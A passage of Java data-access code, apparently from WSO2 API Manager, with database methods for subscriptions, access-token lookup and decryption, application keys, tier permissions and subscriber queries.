(APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ? " + "OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitiveComp = " AND ( (APP.APPLICATION_ID IN (SELECT " + "APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER(?) ))"; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitiveComp; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] groupIdArr = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 2); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); int paramIndex = groupIdArr.length + 1; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, groupingId); ps.setString(3, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseInSensitive; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, subscriber.getName()); } result = ps.executeQuery(); Map<String, Set<SubscribedAPI>> map = new TreeMap<String, Set<SubscribedAPI>>(); LRUCache<Integer, Application> applicationCache = new LRUCache<Integer, Application>(100); while (result.next()) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubscriptionId(result.getInt("SUBS_ID")); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); String tierName = result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID); subscribedAPI.setTier(new Tier(tierName)); subscribedAPI.setUUID(result.getString("SUB_UUID")); //setting NULL for subscriber. If needed, Subscriber object should be constructed & // passed in int applicationId = result.getInt("APP_ID"); Application application = applicationCache.get(applicationId); if (application == null) { application = new Application(result.getString("APP_NAME"), subscriber); application.setId(result.getInt("APP_ID")); application.setTokenType(result.getString("APP_TOKEN_TYPE")); application.setCallbackUrl(result.getString("CALLBACK_URL")); application.setUUID(result.getString("APP_UUID")); if (multiGroupAppSharingEnabled) { application.setGroupId(getGroupId(application.getId())); application.setOwner(result.getString("OWNER")); } applicationCache.put(applicationId, application); } subscribedAPI.setApplication(application); if (!map.containsKey(application.getName())) { map.put(application.getName(), new TreeSet<>(new Comparator<SubscribedAPI>() { public int compare(SubscribedAPI o1, SubscribedAPI o2) { int placement = o1.getApiId().getApiName().compareTo(o2.getApiId().getApiName()); if (placement == 0) { return new APIVersionComparator().compare(new API(o1.getApiId()), new API(o2.getApiId ())); } return placement; } })); } map.get(application.getName()).add(subscribedAPI); } for (Map.Entry<String, Set<SubscribedAPI>> entry : map.entrySet()) { subscribedAPIs.addAll(entry.getValue()); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } public boolean isAccessTokenExists(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); String getTokenSql = SQLConstants.IS_ACCESS_TOKEN_EXISTS_PREFIX + accessTokenStoreTable + SQLConstants.IS_ACCESS_TOKEN_EXISTS_SUFFIX; boolean tokenExists = false; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); String encryptedAccessToken = APIUtil.encryptToken(accessToken); ps.setString(1, encryptedAccessToken); result = ps.executeQuery(); while (result.next()) { tokenExists = true; } } catch (SQLException e) { handleException("Failed to check availability of the access token. ", e); } catch (CryptoException e) { handleException("Failed to check availability of the access token. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenExists; } public boolean isAccessTokenRevoked(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); String getTokenSql = SQLConstants.IS_ACCESS_TOKEN_REVOKED_PREFIX + accessTokenStoreTable + SQLConstants.IS_ACCESS_TOKE_REVOKED_SUFFIX; boolean tokenExists = false; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); String encryptedAccessToken = APIUtil.encryptToken(accessToken); ps.setString(1, encryptedAccessToken); result = ps.executeQuery(); while (result.next()) { if (!"REVOKED".equals(result.getString("TOKEN_STATE"))) { tokenExists = true; } } } catch (SQLException e) { handleException("Failed to check availability of the access token. ", e); } catch (CryptoException e) { handleException("Failed to check availability of the access token. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenExists; } public APIKey getAccessTokenData(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; APIKey apiKey = new APIKey(); String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableFromAccessToken(accessToken, accessTokenStoreTable); String getTokenSql = SQLConstants.GET_ACCESS_TOKEN_DATA_PREFIX + accessTokenStoreTable + SQLConstants .GET_ACCESS_TOKEN_DATA_SUFFIX; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); ps.setString(1, APIUtil.encryptToken(accessToken)); result = ps.executeQuery(); if (result.next()) { String decryptedAccessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); // todo - check String endUserName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_AUTHORIZED_USER); String domainName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String endUsernameWithDomain = UserCoreUtil.addDomainToName(endUserName, domainName); apiKey.setAuthUser(endUsernameWithDomain); apiKey.setAccessToken(decryptedAccessToken); apiKey.setCreatedDate(result.getTimestamp("TIME_CREATED").toString().split("\\.")[0]); String consumerKey = result.getString("CONSUMER_KEY"); apiKey.setConsumerKey(consumerKey); apiKey.setValidityPeriod(result.getLong("VALIDITY_PERIOD")); List<String> scopes = new ArrayList<String>(); do { scopes.add(result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } while (result.next()); apiKey.setTokenScope(getScopeString(scopes)); } } catch (SQLException e) { handleException("Failed to get the access token data. ", e); } catch (CryptoException e) { handleException("Failed to get the access token data. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKey; } public Map<Integer, APIKey> getAccessTokens(String query) throws APIManagementException { Map<Integer, APIKey> tokenDataMap = new HashMap<Integer, APIKey>(); if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String[] keyStoreTables = APIUtil.getAvailableKeyStoreTables(); if (keyStoreTables != null) { for (String keyStoreTable : keyStoreTables) { Map<Integer, APIKey> tokenDataMapTmp = getAccessTokens(query, getTokenSql(keyStoreTable)); tokenDataMap.putAll(tokenDataMapTmp); } } } else { tokenDataMap = getAccessTokens(query, getTokenSql(null)); } return tokenDataMap; } private Map<Integer, APIKey> getAccessTokens(String query, String getTokenSql) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Map<Integer, APIKey> tokenDataMap = new HashMap<Integer, APIKey>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); result = ps.executeQuery(); boolean accessTokenRowBreaker = false; Integer i = 0; while (accessTokenRowBreaker || result.next()) { accessTokenRowBreaker = false; String accessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); String regex = "(?i)[a-zA-Z0-9_.-|]*" + query.trim() + "(?i)[a-zA-Z0-9_.-|]*"; Pattern pattern; Matcher matcher; pattern = Pattern.compile(regex); matcher = pattern.matcher(accessToken); if (matcher.matches()) { APIKey apiKey = new APIKey(); apiKey.setAccessToken(accessToken); String username = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_AUTHORIZED_USER); String domainName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String endUsernameWithDomain = UserCoreUtil.addDomainToName(username, domainName); apiKey.setAuthUser(endUsernameWithDomain); apiKey.setCreatedDate(result.getTimestamp("TIME_CREATED").toString().split("\\.")[0]); String consumerKey = result.getString("CONSUMER_KEY"); apiKey.setConsumerKey(consumerKey); apiKey.setValidityPeriod(result.getLong("VALIDITY_PERIOD")); // Load all the rows to in memory and build the scope string List<String> scopes = new ArrayList<String>(); String tokenString = result.getString("ACCESS_TOKEN"); do { String currentRowTokenString = result.getString("ACCESS_TOKEN"); if (tokenString.equals(currentRowTokenString)) { scopes.add(result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } else { accessTokenRowBreaker = true; break; } } while (result.next()); apiKey.setTokenScope(getScopeString(scopes)); tokenDataMap.put(i, apiKey); i++; } } } catch (SQLException e) { handleException("Failed to get access token data. ", e); } catch (CryptoException e) { handleException("Failed to get access token data. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenDataMap; } private String getTokenSql(String accessTokenStoreTable) { String tokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; if (accessTokenStoreTable != null) { tokenStoreTable = accessTokenStoreTable; } return SQLConstants.GET_TOKEN_SQL_PREFIX + tokenStoreTable + SQLConstants.GET_TOKEN_SQL_SUFFIX; } public Map<Integer, APIKey> getAccessTokensByUser(String user, String loggedInUser) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Map<Integer, APIKey> tokenDataMap = new HashMap<Integer, APIKey>(); String accessTokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; accessTokenStoreTable = getAccessTokenStoreTableNameOfUserId(user, accessTokenStoreTable); String getTokenSql = SQLConstants.GET_ACCESS_TOKEN_BY_USER_PREFIX + accessTokenStoreTable + SQLConstants .GET_ACCESS_TOKEN_BY_USER_SUFFIX; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getTokenSql); ps.setString(1, user); result = ps.executeQuery(); Integer i = 0; boolean accessTokenRowBreaker = false; while (accessTokenRowBreaker || result.next()) { accessTokenRowBreaker = false; String username = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_AUTHORIZED_USER); String domainName = result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_USER_DOMAIN); String authorizedUserWithDomain = UserCoreUtil.addDomainToName(username, domainName); if (APIUtil.isLoggedInUserAuthorizedToRevokeToken(loggedInUser, authorizedUserWithDomain)) { String accessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); APIKey apiKey = new APIKey(); apiKey.setAccessToken(accessToken); apiKey.setAuthUser(authorizedUserWithDomain); apiKey.setCreatedDate(result.getTimestamp("TIME_CREATED").toString().split("\\.")[0]); String consumerKey = result.getString("CONSUMER_KEY"); apiKey.setConsumerKey(consumerKey); apiKey.setValidityPeriod(result.getLong("VALIDITY_PERIOD")); // Load all the rows to in memory and build the scope string List<String> scopes = new ArrayList<String>(); String tokenString = result.getString("ACCESS_TOKEN"); do { String currentRowTokenString = result.getString("ACCESS_TOKEN"); if (tokenString.equals(currentRowTokenString)) { scopes.add(result.getString(APIConstants.IDENTITY_OAUTH2_FIELD_TOKEN_SCOPE)); } else { accessTokenRowBreaker = true; break; } } while (result.next()); apiKey.setTokenScope(getScopeString(scopes)); tokenDataMap.put(i, apiKey); i++; } } } catch (SQLException e) { handleException("Failed to get access token data. ", e); } catch (CryptoException e) { handleException("Failed to get access token data. ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return tokenDataMap; } private Map<String, OAuthApplicationInfo> getOAuthApplications(int applicationId) throws APIManagementException { Map<String, OAuthApplicationInfo> map = new HashMap<String, OAuthApplicationInfo>(); OAuthApplicationInfo prodApp = getClientOfApplication(applicationId, "PRODUCTION"); if (prodApp != null) { map.put("PRODUCTION", prodApp); } OAuthApplicationInfo sandboxApp = getClientOfApplication(applicationId, "SANDBOX"); if (sandboxApp != null) { map.put("SANDBOX", sandboxApp); } return map; } public OAuthApplicationInfo getClientOfApplication(int applicationID, String keyType) throws APIManagementException { String sqlQuery = SQLConstants.GET_CLIENT_OF_APPLICATION_SQL; KeyManager keyManager = null; OAuthApplicationInfo oAuthApplication = null; Connection connection = null; PreparedStatement ps = null; ResultSet rs = null; String consumerKey = null; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setInt(1, applicationID); ps.setString(2, keyType); rs = ps.executeQuery(); while (rs.next()) { consumerKey = rs.getString(1); } if (consumerKey != null) { keyManager = KeyManagerHolder.getKeyManagerInstance(); oAuthApplication = keyManager.retrieveApplication(consumerKey); } } catch (SQLException e) { handleException("Failed to get client of application. SQL error", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, rs); } return oAuthApplication; } public APIKey getKeyStatusOfApplication(String keyType, int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; APIKey key = null; String sqlQuery = SQLConstants.GET_KEY_STATUS_OF_APPLICATION_SQL; try { connection = APIMgtDBUtil.getConnection(); preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setInt(1, applicationId); preparedStatement.setString(2, keyType); resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { key = new APIKey(); key.setState(resultSet.getString("STATE")); } } catch (SQLException e) { handleException("Error occurred while getting the State of Access Token", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return key; } /** * Gets ConsumerKeys when given the Application ID. * * @param applicationId * @return {@link java.util.Set} containing ConsumerKeys * @throws APIManagementException */ public Set<String> getConsumerKeysOfApplication(int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; Set<String> consumerKeys = new HashSet<String>(); String sqlQuery = SQLConstants.GET_CONSUMER_KEYS_OF_APPLICATION_SQL; try { connection = APIMgtDBUtil.getConnection(); preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setInt(1, applicationId); resultSet = preparedStatement.executeQuery(); while (resultSet.next()) { String consumerKey = resultSet.getString("CONSUMER_KEY"); if (consumerKey != null) { consumerKeys.add(consumerKey); } } } catch (SQLException e) { handleException("Error occurred while getting the State of Access Token", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return consumerKeys; } public Set<String> getApplicationKeys(int applicationId) throws APIManagementException { Set<String> apiKeys = new HashSet<String>(); if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String[] keyStoreTables = APIUtil.getAvailableKeyStoreTables(); if (keyStoreTables != null) { for (String keyStoreTable : keyStoreTables) { apiKeys = getApplicationKeys(applicationId, getKeysSql(keyStoreTable)); if (apiKeys.size() > 0) { break; } } } } else { apiKeys = getApplicationKeys(applicationId, getKeysSql(null)); } return apiKeys; } public void updateTierPermissions(String tierName, String permissionType, String roles, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement insertOrUpdatePS = null; ResultSet resultSet = null; int tierPermissionId = -1; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String getTierPermissionQuery = SQLConstants.GET_TIER_PERMISSION_ID_SQL; ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); if (resultSet.next()) { tierPermissionId = resultSet.getInt("TIER_PERMISSIONS_ID"); } if (tierPermissionId == -1) { String query = SQLConstants.ADD_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tenantId); insertOrUpdatePS.execute(); } else { String query = SQLConstants.UPDATE_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tierPermissionId); insertOrUpdatePS.setInt(5, tenantId); insertOrUpdatePS.executeUpdate(); } conn.commit(); } catch (SQLException e) { handleException("Error in updating tier permissions: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(insertOrUpdatePS, null, null); } } public Set<TierPermissionDTO> getTierPermissions(int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; Set<TierPermissionDTO> tierPermissions = new HashSet<TierPermissionDTO>(); try { String getTierPermissionQuery = SQLConstants.GET_TIER_PERMISSIONS_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setInt(1, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { TierPermissionDTO tierPermission = new TierPermissionDTO(); tierPermission.setTierName(resultSet.getString("TIER")); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null && !roles.isEmpty()) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } tierPermissions.add(tierPermission); } } catch (SQLException e) { handleException("Failed to get Tier permission information ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermissions; } public TierPermissionDTO getTierPermission(String tierName, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; TierPermissionDTO tierPermission = null; try { String getTierPermissionQuery = SQLConstants.GET_PERMISSION_OF_TIER_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { tierPermission = new TierPermissionDTO(); tierPermission.setTierName(tierName); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } } } catch (SQLException e) { handleException("Failed to get Tier permission information for Tier " + tierName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermission; } public TierPermissionDTO getThrottleTierPermission(String tierName, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; TierPermissionDTO tierPermission = null; try { String getTierPermissionQuery = SQLConstants.GET_THROTTLE_TIER_PERMISSION_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { tierPermission = new TierPermissionDTO(); tierPermission.setTierName(tierName); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } } } catch (SQLException e) { handleException("Failed to get Tier permission information for Tier " + tierName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermission; } public void updateThrottleTierPermissions(String tierName, String permissionType, String roles, int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement insertOrUpdatePS = null; ResultSet resultSet = null; int tierPermissionId = -1; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String getTierPermissionQuery = SQLConstants.GET_THROTTLE_TIER_PERMISSION_ID_SQL; ps = conn.prepareStatement(getTierPermissionQuery); ps.setString(1, tierName); ps.setInt(2, tenantId); resultSet = ps.executeQuery(); if (resultSet.next()) { tierPermissionId = resultSet.getInt("THROTTLE_TIER_PERMISSIONS_ID"); } if (tierPermissionId == -1) { String query = SQLConstants.ADD_THROTTLE_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tenantId); insertOrUpdatePS.execute(); } else { String query = SQLConstants.UPDATE_THROTTLE_TIER_PERMISSION_SQL; insertOrUpdatePS = conn.prepareStatement(query); insertOrUpdatePS.setString(1, tierName); insertOrUpdatePS.setString(2, permissionType); insertOrUpdatePS.setString(3, roles); insertOrUpdatePS.setInt(4, tierPermissionId); insertOrUpdatePS.setInt(5, tenantId); insertOrUpdatePS.executeUpdate(); } conn.commit(); } catch (SQLException e) { handleException("Error in updating tier permissions: " + e.getMessage(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); APIMgtDBUtil.closeAllConnections(insertOrUpdatePS, null, null); } } public Set<TierPermissionDTO> getThrottleTierPermissions(int tenantId) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet resultSet = null; Set<TierPermissionDTO> tierPermissions = new HashSet<TierPermissionDTO>(); try { String getTierPermissionQuery = SQLConstants.GET_THROTTLE_TIER_PERMISSIONS_SQL; conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(getTierPermissionQuery); ps.setInt(1, tenantId); resultSet = ps.executeQuery(); while (resultSet.next()) { TierPermissionDTO tierPermission = new TierPermissionDTO(); tierPermission.setTierName(resultSet.getString("TIER")); tierPermission.setPermissionType(resultSet.getString("PERMISSIONS_TYPE")); String roles = resultSet.getString("ROLES"); if (roles != null && !roles.isEmpty()) { String roleList[] = roles.split(","); tierPermission.setRoles(roleList); } tierPermissions.add(tierPermission); } } catch (SQLException e) { handleException("Failed to get Tier permission information ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return tierPermissions; } private Set<String> getApplicationKeys(int applicationId, String getKeysSql) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Set<String> apiKeys = new HashSet<String>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getKeysSql); ps.setInt(1, applicationId); result = ps.executeQuery(); while (result.next()) { apiKeys.add(APIUtil.decryptToken(result.getString("ACCESS_TOKEN"))); } } catch (SQLException e) { handleException("Failed to get keys for application: " + applicationId, e); } catch (CryptoException e) { handleException("Failed to get keys for application: " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKeys; } private String getKeysSql(String accessTokenStoreTable) { String tokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; if (accessTokenStoreTable != null) { tokenStoreTable = accessTokenStoreTable; } return SQLConstants.GET_KEY_SQL_PREFIX + tokenStoreTable + SQLConstants.GET_KEY_SQL_SUFFIX; } /** * Get access token data based on application ID * * @param subscriptionId Subscription Id * @return access token data * @throws APIManagementException */ public Map<String, String> getAccessTokenData(int subscriptionId) throws APIManagementException { Map<String, String> apiKeys = new HashMap<String, String>(); if (APIUtil.checkAccessTokenPartitioningEnabled() && APIUtil.checkUserNameAssertionEnabled()) { String[] keyStoreTables = APIUtil.getAvailableKeyStoreTables(); if (keyStoreTables != null) { for (String keyStoreTable : keyStoreTables) { apiKeys = getAccessTokenData(subscriptionId, getKeysSqlUsingSubscriptionId(keyStoreTable)); if (apiKeys.size() > 0) { break; } } } } else { apiKeys = getAccessTokenData(subscriptionId, getKeysSqlUsingSubscriptionId(null)); } return apiKeys; } private Map<String, String> getAccessTokenData(int subscriptionId, String getKeysSql) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; Map<String, String> apiKeys = new HashMap<String, String>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getKeysSql); ps.setInt(1, subscriptionId); result = ps.executeQuery(); while (result.next()) { apiKeys.put("token", APIUtil.decryptToken(result.getString("ACCESS_TOKEN"))); apiKeys.put("status", result.getString("TOKEN_STATE")); } } catch (SQLException e) { handleException("Failed to get keys for application: " + subscriptionId, e); } catch (CryptoException e) { handleException("Failed to get keys for application: " + subscriptionId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKeys; } private String getKeysSqlUsingSubscriptionId(String accessTokenStoreTable) { String tokenStoreTable = APIConstants.ACCESS_TOKEN_STORE_TABLE; if (accessTokenStoreTable != null) { tokenStoreTable = accessTokenStoreTable; } return SQLConstants.GET_KEY_SQL_OF_SUBSCRIPTION_ID_PREFIX + tokenStoreTable + SQLConstants.GET_KEY_SQL_OF_SUBSCRIPTION_ID_SUFFIX; } /** * This method returns the set of Subscribers for given provider * * @param providerName name of the provider * @return Set<Subscriber> * @throws APIManagementException if failed to get subscribers for given provider */ public Set<Subscriber> getSubscribersOfProvider(String providerName) throws APIManagementException { Set<Subscriber> subscribers = new HashSet<Subscriber>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { String sqlQuery = SQLConstants.GET_SUBSCRIBERS_OF_PROVIDER_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(providerName)); result = ps.executeQuery(); while (result.next()) { // Subscription table should have API_VERSION AND API_PROVIDER Subscriber subscriber = new Subscriber(result.getString(APIConstants.SUBSCRIBER_FIELD_EMAIL_ADDRESS)); subscriber.setName(result.getString(APIConstants.SUBSCRIBER_FIELD_USER_ID)); subscriber.setSubscribedDate(result.getDate(APIConstants.SUBSCRIBER_FIELD_DATE_SUBSCRIBED)); subscribers.add(subscriber); } } catch (SQLException e) { handleException("Failed to subscribers for :" + providerName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribers; } public Set<Subscriber> getSubscribersOfAPI(APIIdentifier identifier) throws APIManagementException { Set<Subscriber> subscribers = new HashSet<Subscriber>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { String sqlQuery = SQLConstants.GET_SUBSCRIBERS_OF_API_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); ps.setString(2, identifier.getApiName()); ps.setString(3, identifier.getVersion()); result = ps.executeQuery(); while (result.next()) { Subscriber subscriber = new Subscriber(result.getString(APIConstants.SUBSCRIBER_FIELD_USER_ID)); subscriber.setSubscribedDate(result.getTimestamp(APIConstants.SUBSCRIBER_FIELD_DATE_SUBSCRIBED)); subscribers.add(subscriber); } } catch (SQLException e) { handleException("Failed to get subscribers for :" + identifier.getApiName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribers; } public long getAPISubscriptionCountByAPI(APIIdentifier identifier) throws APIManagementException { String sqlQuery = SQLConstants.GET_API_SUBSCRIPTION_COUNT_BY_API_SQL; long subscriptions = 0; Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); ps.setString(2, identifier.getApiName()); ps.setString(3, identifier.getVersion()); result = ps.executeQuery(); while (result.next()) { subscriptions = result.getLong("SUB_ID"); } } catch (SQLException e) { handleException("Failed to get subscription count for API", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptions; } /** * This method is used to update the subscriber * * @param identifier APIIdentifier * @param context Context of the API * @param applicationId Application id * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to update subscriber */ public void updateSubscriptions(APIIdentifier identifier, String context, int applicationId, String subscriber) throws APIManagementException { addSubscription(identifier, context, applicationId, APIConstants.SubscriptionStatus.UNBLOCKED, subscriber); } /** * This method is used to update the subscription * * @param identifier APIIdentifier * @param subStatus Subscription Status[BLOCKED/UNBLOCKED] * @param applicationId Application id * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to update subscriber */ public void updateSubscription(APIIdentifier identifier, String subStatus, int applicationId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement updatePs = null; int apiId = -1; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String getApiQuery = SQLConstants.GET_API_ID_SQL; ps = conn.prepareStatement(getApiQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); ps.setString(2, identifier.getApiName()); ps.setString(3, identifier.getVersion()); resultSet = ps.executeQuery(); if (resultSet.next()) { apiId = resultSet.getInt("API_ID"); } if (apiId == -1) { String msg = "Unable to get the API ID for: " + identifier; log.error(msg); throw new APIManagementException(msg); } String subsCreateStatus = getSubscriptionCreaeteStatus(identifier, applicationId, 